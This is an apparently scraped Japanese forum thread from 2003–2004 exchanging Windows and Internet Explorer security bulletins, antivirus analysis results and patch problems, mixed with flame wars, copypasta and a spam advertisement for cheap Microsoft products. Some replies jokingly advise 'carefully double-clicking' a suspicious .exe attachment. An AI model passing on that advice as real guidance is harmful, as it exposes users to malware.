http://www.microsoft.com/japan/technet/security/bulletin/MS04-004.asp
影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition

マイクロソフト サポート技術情報 - 834489
Internet Explorer で HTTP URL と HTTPS URL のユーザー情報を処理する際のデフォルトの動作を
変更するソフトウェア アップデートのリリースについて
http://support.microsoft.com/default.aspx?scid=kb;ja;834489
概要
マイクロソフトは HTTP URL および HTTPS URL (SSL を使用する HTTP URL) に含まれるユーザー名と
パスワードを Internet Explorer によって処理しないようにする修正プログラムをリリースしました。
MS04-004: Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)をインストールすると、
Internet Explorer またはエクスプローラで次の URL 構文がサポートされなくなります。
http(s)://username:password@server/resource.ext
この資料は Internet Explorer のデフォルトの動作変更をお知らせすることを目的としています。
976窓板住人 ◆winDOwS0aE :04/02/11 14:14 ID:???
ASN .1 の脆弱性により、コードが実行される (828028) (MS04-007)
登録日 : 2004/02/11 更新日 : 2004/02/11
http://www.microsoft.com/japan/technet/security/bulletin/MS04-007.asp

このセキュリティ情報の対象となるユーザー : MicrosoftR WindowsR を使用しているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : システム管理者は、このセキュリティ修正プログラムを直ちに適用して下さい。
含まれる過去の修正プログラム : なし

警告 : Windows NT 4.0 (Workstation、Server および Terminal Server Edition) は
影響を受けるファイルを既定でインストールしません。このファイルは MS03-041 の
Windows NT 4.0 用のセキュリティ修正プログラムおよびそのほかのセキュリティ関連
以外のいくつかの修正プログラムの一部としてインストールされます。MS03-041 の
Windows NT 4.0 用のセキュリティ修正プログラムがインストールされていない場合に
おいても、この修正プログラムが必要となる可能性があります。影響を受けるファイルが
インストールされているかどうかを確認するためには、ファイル名 msasn1.dll を検索
して下さい。このファイルが存在する場合、このセキュリティ修正プログラムが必要と
なります。Windows Update、Software Update Services および Microsoft Security
Baseline Analyzer もまた、この修正プログラムが必要であるかどうかを正しく検出します。
977窓板住人 ◆winDOwS0aE :04/02/11 14:14 ID:???
影響を受けるソフトウェア :
Microsoft Windows NT Workstation 4.0, Service Pack 6a
Microsoft Windows i/pcnews/1043134572/876" target="_blank">>>876
間違えた。何回もコピペウザイ。
978窓板住人 ◆winDOwS0aE :03/11/25 22:39 ID:???
Windows HotFix Briefings Biweekly(11月21日版)
―― 修正プログラム適用に関する問題点、不具合情報の隔週レポート ――
http://www.atmarkit.co.jp/fwin2k/hotfix/hfbw20031121/hfbw20031121_01.html

・MS03-043の修正プログラム適用で、Windows NT 4.0のネットワーク関連機能が機能不全を起こす
・MS03-045の修正プログラムを適用すると、テキスト・ボックスに入力した文字が重複して表示される
・MS03-050をExcel 97に適用すると郵便番号変換ウィザードが機能しなくなる
・「Windows XP SP1 USB 1.1 および 2.0 修正プログラム」の適用で、システムがハングアップする
・MS03-048を適用するとInternet Explorerの画面スクロールが正しく行われなくなる
・Windows 2000 SP4にIE 6.0 SP1を適用するとMS02-050の脆弱性が再発する問題を解決する
 修正プログラムの提供開始

マイクロソフト サポート技術情報 - 832547
[IE] Q824145 (MS03-048) のインストール後、エクスプローラの「関連項目」のリンクが機能しない
http://support.microsoft.com/default.aspx?scid=kb;ja;832547
979窓板住人 ◆winDOwS0aE :03/11/26 23:07 ID:???
980ぼるじょあX ◆TlQZOS.G3s :03/11/27 08:36 ID:???
Internet Explorerの新セキュリティホールは「極めて危険」http://www.zdnet.co.jp/enterprise/0311/26/epi02.html
981名無しさん@お腹いっぱい。:03/11/27 09:32 ID:i7lyECbZ
一番いいのは、Windows使わないこと。これ最強!
実際、linuxでもMacでも困らんよ。
982名無しさん@お腹いっぱい。:03/11/27 14:41 ID:???
LinuxでもMacでもUNIXでもなんでも、きちんとパッチを当ててない
システムはどれも脆弱。これ管理者の常識。
そして、このスレはそういうことを論議するスレでもないことも知れ。
983名無しさん@お腹いっぱい。:03/11/28 11:52 ID:62QqKD1n
(´д`)ノシ先生質問です!
昨日
Microsoft Windows XP 用セキュリティ問題の修正プログラム (KB828035)
をアップデートしたんですが
次の日PCを起動するといきなり青い画面が出てきて
なにかディスクスキャンらしきことを始めてますた。
これってアップデートしたこととは関係ないんですか?
しかも起動に時間がめっちゃかかるんですが...
984名無しさん@お腹いっぱい。:03/11/28 12:33 ID:YO3hFma2
インターネット上のwebサーバはWindowsよりUNIX系OSで立てた物が多いが
ここまで修正パッチに追われることも、頻繁にワームに感染して無駄なトラフィック
を垂れ流すこともない。

 一方Windowsのセキュリティ問題はOS構造そのものに起因しているので、一から
見直さない限り、セキュリティパッチ充て地獄からは逃れられない。

 例えばIEのような一ネットワークアプリをOSにくくりつけるのを止めるだけでも、
安全度は飛躍的にアップすると思われるが、独禁法のがれのためにIEはOSの一部と言い切
って しまった以上、いまさらOSとIEを切り離すことはできない。

 仕方がないのでMSは定期アップデイトという対症療法をユーザーに押しつけることにした。
985名無しさん@お腹いっぱい。:03/11/28 13:36 ID:???
>>885
こういうのがリナ鯖やウニ鯖運用したら、
ワームに感染しても気づかないんだろうな
986名無しさん@お腹いっぱい。:03/11/28 13:56 ID:UaD4/qdC
>>656
お願いします
987名無しさん@お腹いっぱい。:03/11/28 14:01 ID:FA95u7l+
>>885 新しいPCに赤帽入れてとりあえずちゃんと動くかどうかネットにつなげて
その日は疲れたから電源入れっぱなしで寝たら、次の日しっかり踏み台にされたらしく
プロバから注意のメールが来てた。Linux恐るべし。
988名無しさん@お腹いっぱい。:03/11/28 17:09 ID:UaD4/qdC
>>656
norton internet security2003 を使っているんですけど
firewallのプログラム制御で>>656は すべて遮断 でいいんですか?
989名無しさん@お腹いっぱい。:03/11/28 17:37 ID:bu19wB/p
>>888
Debianにしてスクリプトで毎日apt-getして済ます。
おいらはソースにstableを指定して自爆したことがあるけど。
990名無しさん@お腹いっぱい。:03/11/28 19:53 ID:Dc9lygu4
>>885

ホントにユーザーのため? マイクロソフトのセキュリティ戦略を検証する
http://japan.cnet.com/news/pers/story/0,2000047682,20062200,00.htm

いい加減みんな気がつき始めてるな。。
だまされ続けてるのは頭の悪いドザだけということで。
991名無しさん@お腹いっぱい。:03/11/28 20:01 ID:???
>>888

詳細きぼん。踏み台にされたのは、何のサービス?
992名無しさん@お腹いっぱい。:03/11/28 20:03 ID:???
NASAかどっかへのアタックの踏み台にされたのも個人のLinuxPCだったっけ?
Linux=安全と思いこんでる厨は本当に迷惑だな。
993名無しさん@お腹いっぱい。:03/11/28 20:05 ID:???
25歳。
去年まで金無し君だったけど、ネット通販で
マイクロソフト製品を激安でゲット。一度やってみなよ。
買うだけ買って開封せずにオークションで転売することもできるし、ゲーム買って
近所のゲーム屋に売れば手っ取り早く現金にできる。
金無くてもオフィスXPとか超安い。
ダンジョンシージとかフライトシミュレーターとか色々あるのでマジでお勧め。

http://www.tatakiuri.com/
994名無しさん@お腹いっぱい。:03/11/28 20:07 ID:???
>>893
少なくともどっかのホムペ見ただけでウイルス感染するアホOSよりはマシ。
995名無しさん@お腹いっぱい。:03/11/28 20:08 ID:???
>>895
アホOSって、OSXっていう名前かい?
996名無しさん@お腹いっぱい。:03/11/28 20:09 ID:???
いえいえ、ブラウザーとOSが一体になっているウィンドウズのことです。
997名無しさん@お腹いっぱい。:03/11/28 20:56 ID:???
いい加減スレ違いな話はやみり。
ここはWindows関係のセキュリティ情報の交換場所。
ゴミが増えるのは迷惑。
998名無しさん@お腹いっぱい。:03/11/28 23:14 ID:???
999ぼるじょあX ◆TlQZOS.G3s :03/11/29 10:23 ID:???
IEに複数のセキュリティ・ホール,対策はアクティブスクリプトを無効にすること
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031128/136983/

(・3・)ノ
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: MhtRedirLaunchInetExe-Demo.zip
ファイル名: mhtml_file_for_codebase_automated.htm
デベロッパーノート

MhtRedirLaunchInetExe-Demo.zip is a self-extracting zip file that contains a clean file.
mhtml_file_for_codebase_automated.htm This file is proof-of-concept for an exploit.
It is not viral but we suggest to delete it.
This file is contained by MhtRedirLaunchInetExe-Demo.zip.

(C)2003 シマンテック・セキュリティ・レスポンス
(P)2003 シマンテック・セキュリティ・レスポンス
最近何も無いの?
1003名無しさん@お腹いっぱい。:03/12/10 14:54 ID:NKc9m8VS
>>903
Win98だけでなく、OfficeXP以前のパッチの提供が止まるかもしれない。
1004名無しさん@お腹いっぱい。:03/12/10 20:20 ID:r1+HXUMk
Internet Explorerにオンライン詐欺を助長する新たな欠陥

 米Microsoftのウェブブラウザ、Internet Explorer(IE)に新たな欠陥が発見された。
あるセキュリティ研究者によると、この欠陥を利用したオンライン詐欺師は、インター
ネットユーザーを騙し、機密情報を開示させたり、悪意あるコードを実行させることが
可能という。

http://japan.cnet.com/news/ent/story/0,2000047623,20062654,00.htm
Microsoftの“月例”セキュリティ・パッチ、今月はなし
ttp://arena.nikkeibp.co.jp/news/20031210/106687/

どーみてもさぼってるだけぢゃん。。。
1006名無しさん@お腹いっぱい。:03/12/11 00:05 ID:F55/6LC+
>>906
新たにパッチを出すよりも、JAVAを外したりとか、
IEを外したりできる公式のソフトを出してほしい、そのほうが早いよ・・・
保守
ttp://www.asahi.com/national/update/1217/014.html
 patch 当ててなかったというのも痛い。
 除去するのにシステムの再インストールが必要だったって、いったい、、、
誰も責任取ることのないところなんてこんなもんでしょ。
1010名無しさん@お腹いっぱい。:03/12/18 06:44 ID:NQmblQqQ
URL偽装
ttp://pc.2ch.net/test/read.cgi/pcnews/1043134572/l50
%[email protected]/cda/special/2003/12/16/1522.html
IEにURLを偽装できるパッチ未公開の脆弱性が発見される
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2003/12.html#20031211_IE

NAI VirusScan のウィルス定義ファイル 4311 以降で、この欠陥に対応されている。
http://www.nai.com/japan/

Exploit-URLSpoof
http://www.nai.com/japan/security/virE.asp?v=Exploit-URLSpoof

こんな感じで表示される:
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/0105-exploit-urlspoof.jpg

 
1012Download.Trojan:04/01/06 15:17 ID:???
Download.Trojan

セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

[Full-Disclosure] Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/full-disclosure/2004.01/msg00011.html
http://www.malware.com/
1013Download.Trojan:04/01/06 15:18 ID:???
ファイルを分析しました。
送られたそれぞれのファイルについてわかったことを以下に報告します。
結果: デベロッパーノートを参照してください。
結果:このファイルは次のウィルスに感染しています:
Download.Trojan

デベロッパーノート:
This archive contains malicious code. Any malicious contents will be detected by NAV
if they are extracted from the archive. Please delete this file.
***html is non-repairable threat. NAV with the latest beta definition detects this.
Please delete this file and replace it if neccessary. Please follow the instruction
at the end of this email message to install the latest beta definitions.
This file is contained by ***

***.html will download a Trojan dropper to your system when running.
NAV with the latest beta definition detects this. Please delete this file
and replace it if neccessary. Please follow the instruction at the end of
this email message to install the latest beta definitions.

ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスは
ウイルス、ワームまたはトロイの木馬に感染していると判断いたしました。

(C)2004 シマンテック・セキュリティ・レスポンス
(P)2004 シマンテック・セキュリティ・レスポンス
1014窓板住人 ◆winDOwS0aE :04/01/10 16:13 ID:92CIWvGH
あけましておめでとうございます。
さて、以下のようなニュースが出てますのでご注意を。

Norton AntiVirusで定義ファイルを更新するとMS Officeに不具合
http://japan.cnet.com/news/ent/story/0,2000047623,20063594,00.htm

2004 年 1 月 7 日以降、コンピュータの動作が異常に遅くなり、Microsoft Word や Excel が起動できなくなった
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/jp_docid/20040108142217958
1015窓板住人 ◆winDOwS0aE :04/01/11 00:54 ID:8y3CVxYJ
マイクロソフト サポート技術情報 - 834374
Windows Update でエラーが発生した場合のエラー番号について
http://support.microsoft.com/default.aspx?scid=kb;ja;834374

マイクロソフト サポート技術情報 - 319011
エラー メッセージ : 次のファイルが存在しないかまたは壊れているため、
Windows 2000 を起動できませんでした: \Winnt\System32\Config\System
http://support.microsoft.com/default.aspx?scid=kb;ja;319011

マイクロソフト サポート技術情報 - 834367
ハイパー スレッディング対応マシンにて修正プログラムをアンインストールすると発生する問題
http://support.microsoft.com/default.aspx?scid=kb;ja;834367

マイクロソフト サポート技術情報 - 823659
セキュリティ設定およびユーザー権利の割り当てを変更すると、クライアント、サービス、
およびプログラムとの互換性がなくなる
http://support.microsoft.com/default.aspx?scid=kb;ja;823659

マイクロソフト サポート技術情報 - 833330
Windows 2000 または Windows XP を実行するコンピュータから Blaster ワームまたは
Nachi ワームを駆除するツールについて
http://support.microsoft.com/default.aspx?scid=kb;ja;833330
IEに2種類の新たなセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/

(・3・) またですYO
1017名無しさん@お腹いっぱい。:04/01/11 23:08 ID:F+iWJxJ/
小5のある日、兄の自転車を借りて坂を下ってたら
実はブレーキがすごく甘くなってて、
ブレーキしてもどんどんスピードが上がっていって
靴のつま先で無理やりブレーキさせても靴が磨り減るだけで
仕方なく路肩の植木に身を投げたら擦り傷いっぱいでスカート破けて
そのままエロティックな格好で泣きながら家に帰ったら
母がいきなり
「誰にやられたの!」
と聞いて来たのでは私はお兄ちゃんの自転車で…と言うつもりが
泣きじゃくってるせいでうまくいえず
「お…お兄ちゃん…」
と呟いたら母は突然倒れてそのまま気絶してました。
1018名無しさん@お腹いっぱい。:04/01/11 23:56 ID:A3N5b2hf
>>918
コピペ
いちいち言わなくても大半のやつはわかるだろ。わからん厨房のほうがわるい。
面白いから好きだけど、この小話。
今月から一人暮らし始めたんですが、なんかおかしなものが見えるんです。

俺の部屋にはユニットバスってのがあるんですが、そこの壁の中に人が住んでるんです。
俺がトイレに行って用を済ませて手を洗おうとすると必ずそいつが出てきて
俺のまねをして手を洗う、そして手を拭くとそいつも手を拭くんです。

初めてそいつに会ったときにお前は誰だと聞いたんですが何かそいつも
同時に何か言おうとしたらしく口をパクパクさせてたからじゃあお前から言えって
言って俺は黙って待ってたんです。そしたらそいつも黙ってるし・・・

で、そんなやりとりが何度かあった後でこっちも我慢できなくなって胸倉を
掴もうとしたんです。そしたらそいつも俺の胸倉を掴もうとするじゃないですか。
俺はそのとき身の危険を感じたんですぐに台所に行って包丁を持ってまた戻ったんです。
もちろん刺したりしませんよ。脅すためです。
そうしたらなんと、そいつも俺と同じように包丁を手に持ってるじゃないですか。

もうこれは本当に危ないと思って俺、そこを飛び出したんです。
こんなとんでもない部屋を紹介した不動産屋に怒鳴り込んでやろうと思ったんですが
部屋に戻らないと電話番号とかわからないし、でも戻ると殺されるかもしれない。
どうすればいいですか?やはり警察に行ったほうがいいんでしょうか?

でも警察は実際に被害がないと動いてくれないって聞いたことがあるので
行っていいものかどうか迷っています。だれかよい知恵を下さい。
1021名無しさん@お腹いっぱい。:04/01/13 01:13 ID:/hNX3t+E
>>921
OSとバージョンは?
1022名無しさん@お腹いっぱい。:04/01/13 02:03 ID:SJsg+GPp
              __,,,,,,
         ,.-'''"-─ `ー,--─'''''''''''i-、,,
      ,.-,/        /::::::::::::::::::::::!,,  \
     (  ,'          i:::::::::::::::::::::;ノ ヽ-、,,/''ー'''"7
      `''|          |:::::::::::::::::::::}     ``ー''"
        !       '、:::::::::::::::::::i
        '、 `-=''''フ'ー''ヽ、::::::::::/ヽ、-─-、,,-'''ヽ 
         \_/     ヽ--く   _,,,..--┴-、 ヽ
                     ``"      \>
1023:04/01/13 02:04 ID:Bidp/OTD
1024窓板住人 ◆winDOwS0aE :04/01/13 22:34 ID:???
ZDNet UK - News - Windows 98 gets support reprieve
http://news.zdnet.co.uk/0,39020330,39119028,00.htm

Microsoft has extended support for Windows 98, Windows 98 SE and Windows ME.
The software giant has extended support for the operating systems until 30 June, 2006.

98/98SE/MEのサポート期間が延長されるとの報道です。
まだ更新されてはおりませんがMS公式のサポート期間は以下のサイトで検索することができます。
http://www.microsoft.com/japan/windows/lifecycle/default.mspx
1026窓板住人 ◆winDOwS0aE :04/01/14 19:30 ID:???
MDAC 機能のバッファ オーバーランにより、コードが実行される (832483) (MS04-003)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-003.asp
このセキュリティ情報の対象となるユーザー : MicrosoftR WindowsR を使用しているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 重要
推奨する対応策 : お客様は、修正プログラムをできるだけ早期にインストールしてください。

Exchange Server 2003 の脆弱性により、権限が昇格する (832759) (MS04-002)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-002.asp
このセキュリティ情報の対象となるユーザー : Outlook Web Access for Microsoft
Exchange Server 2003 を実行しているサーバーを使用しているシステム管理者
脆弱性の影響 : 権限の昇格
最大深刻度 : 警告
推奨する対応策 :
システム管理者はこのセキュリティ修正プログラムを Outlook Web Access for
Microsoft Exchange Server 2003 を実行しているすべてのフロントエンドサーバーに
インストールして下さい。また、バックエンド サーバーをフロントエンドサーバーのロールに
移行する場合を考慮して、このセキュリティ修正プログラムを Exchange Server 2003 を
実行しているすべてのコンピュータにインストールすることを推奨します。

Microsoft Internet Security and Acceleration Server 2000 H.323 フィルタの脆弱性により、
リモートでコードが実行される (816458) (MS04-001)
http://www.microsoft.com/japan/technet/security/bulletin/MS04-001.asp
このセキュリティ情報の対象となるユーザー : Microsoft Internet Security and Acceleration
Server 2000 をご使用のお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様は、セキュリティ修正プログラムを直ちにインストールしてください。
※この件に関してはCERT Advisoryが出てます。
CERTR Advisory CA-2004-01 Multiple H.323 Message Vulnerabilities
http://www.cert.org/advisories/CA-2004-01.html
1027追記 Download.Trojan:04/01/16 00:24 ID:???
1028名無しさん@お腹いっぱい。:04/01/16 01:36 ID:lpjI+vil
1029 :04/01/24 22:46 ID:???
 
1030名無しさん@お腹いっぱい。:04/01/24 22:52 ID:u/qYS5Dx
>>921
それは鏡だよ。
1031名無しさん@お腹いっぱい。:04/01/24 23:17 ID:9lGK4i7l
本文のないメールが来て、そこの添付ファイルがありました。
そのファイルは
vbLf.exe
htmlbanner[1].html
というのがあります。
添付ファイルは実行してません。
これってウィルスですか?
ウィルスだったらメールを削除するだけでいいんでしょうか?
それだけでは何とも判断できませんな。

添付ファイルを注意深くダブルクリックしプロパティを表示して、
その内容をここに貼ってみてください。
1033名無しさん@お腹いっぱい。:04/01/25 01:41 ID:DiSeD67n
スレ違いかもしれませんが、どこで聞いたらいいのかわからないので
よろしくお願いします。
ヤフーメッセンジャーを起動するたびに、
「許可しますか?」というのが表示されているので
邪魔だなと思い、誤って「いいえ」をクリックして
「その状態を記憶する(保存する?)」にしてしまったところ
ヤフーメッセンジャーにログインできなくなりました。
私のミスなんですが、どうしたら解除できるんでしょうか?
アンインストールの後にインストールし直しましたが無理でした。
どなたかアドバイスよろしくお願いします。
1035932:04/01/25 13:43 ID:u4ZKXB5b
>>933
知らない差出人からのメールに添付されてる「.exe」は実行するな、
と聞いたことがあった気がするのですぐ削除しました。
一応なんともないので大丈夫だと思います。
いえ、注意深くダブルクリックすれば大丈夫ですよ。

今回は残念でしたが、また同じようなものが送られてきた時には
細心の注意をはらって、慎重にダブルクリックしてください。
1037932:04/01/25 15:27 ID:u4ZKXB5b
>>937
はい、注意深くダブルクリックすればいいんですね?w
わかりました〜
これからは注意深くダブルクリックしてみますw

貴重なアドバイスありがとうございました
1038名無しさん@お腹いっぱい。:04/01/25 17:49 ID:mmxwL2bB

参考になりました。
>いえ、注意深くダブルクリックすれば大丈夫ですよ。
注意深いダブルクリクってどんなのよ?
心を込めた優しいタッチで軽くダブルクリックすることだと
パソコン教室の先生が教えてくれました

周囲の人たちにみつからないようにこっそりとダブルクリックすることだと
先輩がいってました。
1042亀仙人:04/01/26 21:06 ID:???
ぱふぱふ と、押すのじゃ。
1043名無しさん@お腹いっぱい。:04/01/28 00:03 ID:+Y9QEvWd
内側にねじり混むようにして打つべし!打つべし!打つべし!
1045名無しさん@お腹いっぱい。:04/02/02 01:42 ID:BxQTpS1o

リモートからコマンドを実行できるWindowsの“仕様”を発見
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20040130/139143/

.∧∧
(,,゚Д゚)< 仕様がないOSだこと。
|O旦O
.∪∪
1046名無しさん@お腹いっぱい。:04/02/02 10:00 ID:UXeJ1w6O
やっぱりバックドアがあったか>窓
MS04-004 : Internet Explorer の重要な更新
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)

ttp://www.microsoft.com/japan/security/security_bulletins/MS04-004e.asp

だそうだ。
俺、IEなんて使ってないんだけどなぁ…
1049名無しさん@お腹いっぱい。:04/02/03 12:43 ID:tgaFgwAV
>>948
今やってるが、おっそろしく重いわけだが・・
1050名無しさん@お腹いっぱい。:04/02/03 13:02 ID:LLw/TDhU
マイクロソフトは、高いWindowsServerを無料で使えるのに、サイトはLinuxに依存。

http://www.netcraft.com/?host=microsoft&position=limited&lookup=Search

「What's that site running?]」をクリックして確認して下さい。
世界中のマイクロソフトは、表向きmicrosoft.comだけWindowsServer使っていますが、
実際はLinux依存なのですよ。もう騙されないぞ!

米Microsoftは、自社ウェブサイトを攻撃者から守るために、Linuxを使っている。
http://japan.cnet.com/news/ent/story/0,2000047623,20060667,00.htm

Windowsではとても持ちません。Windows無料で使えるマイクロソフトでさえ使いませんw
Win98seでIE5.5使ってるが
このままで大丈夫なんだよな?
1052怪鼠 ◆9YLawNEZMI :04/02/03 13:16 ID:Bbf945rb
>>948
児童ダウンでそのウプデータンキター
MS04-004 : Internet Explorer の重要な更新
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)
月刊WinUpまた臨時増刊かよ
>>948
これあてたマシン、ネットにつながらなくなっちゃったよTT
>>960
ネット環境は何よ?
どうしてこう穴だらけなんだ、MSの製品は!
と、今更言っても詮無いことか。トホホ・・・。
>>949
Windows95でもない限り、パッチは当てとけ
1058名無しさん@お腹いっぱい。:04/02/04 11:04 ID:WMxm+VNf
ISDN
1060名無しさん@お腹いっぱい。:04/02/05 14:02 ID:4TPjkmux
次スレある?
ニュース板でやる必要ある?
1062名無しさん@お腹いっぱい。:04/02/05 16:41 ID:DOdmFFSr
単発質問やネタスレよりも全然やる意義があるだろう。
下と比べないと存在意義がないスレだな
1064名無しさん@お腹いっぱい。:04/02/06 00:42 ID:pEFbzRDI
IEの最新パッチ--「問題は直っていない」と一部ユーザーから報告
http://japan.cnet.com/news/ent/story/0,2000047623,20064145,00.htm


XPそろそろLonghornに替わるんでしょうに、また欠陥OSだったってことか。
次も期待出来ん Mac買うぞ!! ぼけMS。
>>966
MacよりLinux
【総合】スパイウェア予防駆除関連ソフトPart1
http://pc.2ch.net/test/read.cgi/sec/1064493726/

これをここに統合したらどうかという案がいきなり浮上してきました。
よかですか?
>>967
LinuxよりShidax
ShidaxよりPentax
つうか仕事の大半がプレーンテキストの操作な立場だと、UNIX系の環境が一番快適。
漏れはFreeBSDを使ってるけどな。(MacOS10は軽く弄ったが、吐き気がしたので止めた)

excelで報告書を仕上げるのが仕事な人は、WindowsかMacしか選択肢無いだろうけど。
>>971
*Linux/*BSD上でOOorgでも良いのでは?
殆どの人はVBAなんて使っていないだろうし。
1072窓板住人 ◆winDOwS0aE :04/02/07 02:29 ID:???
すんません、出張してました。まとめて行きます。

■ 「フォルダ」に見せかけ任意のファイルを実行――Windows XPを狙う手口に警告
(ITmedia, 2004.01.28)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/01.html#20040129_folder
概要:Windows XP は、.folder 拡張子がついているとフォルダとして表示する
(.folder 拡張子のファイルにはフォルダアイコンを表示する)
ダブルクリック時にどのように処理するかは、動的に決定する
(中身が HTML のようなら HTML として処理する)
ことを利用し、フォルダのように見えるアイコンをダブルクリックすると悪意ある
プログラムの実行によって攻撃される。

■ Internet Explorer File Download Extension Spoofing
(secunia.com, 2004.01.28)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/01.html#20040130_IEfilespoof
IE 6 に欠陥。ファイル名に CLSID を埋め込むことにより、IE がファイルを「開く」場合に、
本来開かれるべきアプリケーションではなく、CLSID に示されるアプリケーションが起動されてしまう。
1073窓板住人 ◆winDOwS0aE :04/02/07 02:30 ID:???
■ ATOK15・16に不正に一部操作が可能になる脆弱性が発見される〜アップデートモジュールで修正可能
(Internet Watch, 2004.02.02)
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/02.html#20040203_ATOK
概要: http://pc2.2ch.net/test/read.cgi/software/1070102837/792

■Windows版コリャ英和!/LogoVistaシリーズのセキュリティ修正プログラムについて (logovista.co.jp)。
■ RealNetworks, Inc.、セキュリティ脆弱性に対応するアップデートをリリース (real.com)。
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2004/02.html#20040206_various
1074窓板住人 ◆winDOwS0aE :04/02/07 02:44 ID:???
Internet Explorer 用の累積的なセキュリティ修正プログラム (832894) (MS04-004)
http://www.microsoft.com/japan/technet/security/bulletin/MS04-004.asp
影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition

マイクロソフト サポート技術情報 - 834489
Internet Explorer で HTTP URL と HTTPS URL のユーザー情報を処理する際のデフォルトの動作を
変更するソフトウェア アップデートのリリースについて
http://support.microsoft.com/default.aspx?scid=kb;ja;834489
概要
マイクロソフトは HTTP URL および HTTPS URL (SSL を使用する HTTP URL) に含まれるユーザー名と
パスワードを Internet Explorer によって処理しないようにする修正プログラムをリリースしました。
MS04-004: Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)をインストールすると、
Internet Explorer またはエクスプローラで次の URL 構文がサポートされなくなります。
http(s)://username:password@server/resource.ext
この資料は Internet Explorer のデフォルトの動作変更をお知らせすることを目的としています。
1075窓板住人 ◆winDOwS0aE :04/02/11 14:14 ID:???
ASN .1 の脆弱性により、コードが実行される (828028) (MS04-007)
登録日 : 2004/02/11 更新日 : 2004/02/11
http://www.microsoft.com/japan/technet/security/bulletin/MS04-007.asp

このセキュリティ情報の対象となるユーザー : MicrosoftR WindowsR を使用しているお客様
脆弱性の影響 : リモートでコードが実行される
最大深刻度 : 緊急
推奨する対応策 : システム管理者は、このセキュリティ修正プログラムを直ちに適用して下さい。
含まれる過去の修正プログラム : なし

警告 : Windows NT 4.0 (Workstation、Server および Terminal Server Edition) は
影響を受けるファイルを既定でインストールしません。このファイルは MS03-041 の
Windows NT 4.0 用のセキュリティ修正プログラムおよびそのほかのセキュリティ関連
以外のいくつかの修正プログラムの一部としてインストールされます。MS03-041 の
Windows NT 4.0 用のセキュリティ修正プログラムがインストールされていない場合に
おいても、この修正プログラムが必要となる可能性があります。影響を受けるファイルが
インストールされているかどうかを確認するためには、ファイル名 msasn1.dll を検索
して下さい。このファイルが存在する場合、このセキュリティ修正プログラムが必要と
なります。Windows Update、Software Update Services および Microsoft Security
Baseline Analyzer もまた、この修正プログラムが必要であるかどうかを正しく検出します。
1076窓板住人 ◆winDOwS0aE :04/02/11 14:14 ID:???
影響を受けるソフトウェア :
Microsoft Windows NT Workstation 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Service Pack 6a
Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows Server 2003
Microsoft Windows Server 2003 64-Bit Edition
Windows Update からインストールすることもできます。

テストした Microsoft Windows コンポーネント :
影響を受けるコンポーネント : Microsoft ASN.1 Library

絵でみるセキュリティ情報 :
イラストを交えたセキュリティ情報は次のサイトをご覧ください。
http://www.microsoft.com/japan/security/security_bulletins/ms04-007e.asp
セキュリティ情報 for Mobile :
携帯電話、PDA などのモバイルツールからもセキュリティ情報をご覧いただけます。
http://www.microsoft.com/japan/support/mobile/bulletin.aspx?secid=MS04-007
1077窓板住人 ◆winDOwS0aE :04/02/11 14:14 ID:4ThKV5vx
技術的な説明 :
Microsoft ASN.1 Library に脆弱性が存在し、これにより影響を受けるコンピュータで
コードが実行される可能性があります。Microsoft ASN.1 Library の未チェックの
バッファが原因となり、バッファ オーバーフローの脆弱性が起こる可能性があります。
攻撃者は、このバッファ オーバーフローの脆弱性を悪用し、影響を受けるコンピュータ上の
システム特権を用いてコードを実行する可能性があります。攻撃者はプログラムの
インストール、データの表示、変更、削除、完全な特権を持つ新しいアカウントの
作成など、コンピュータで任意の操作を行う可能性があります。
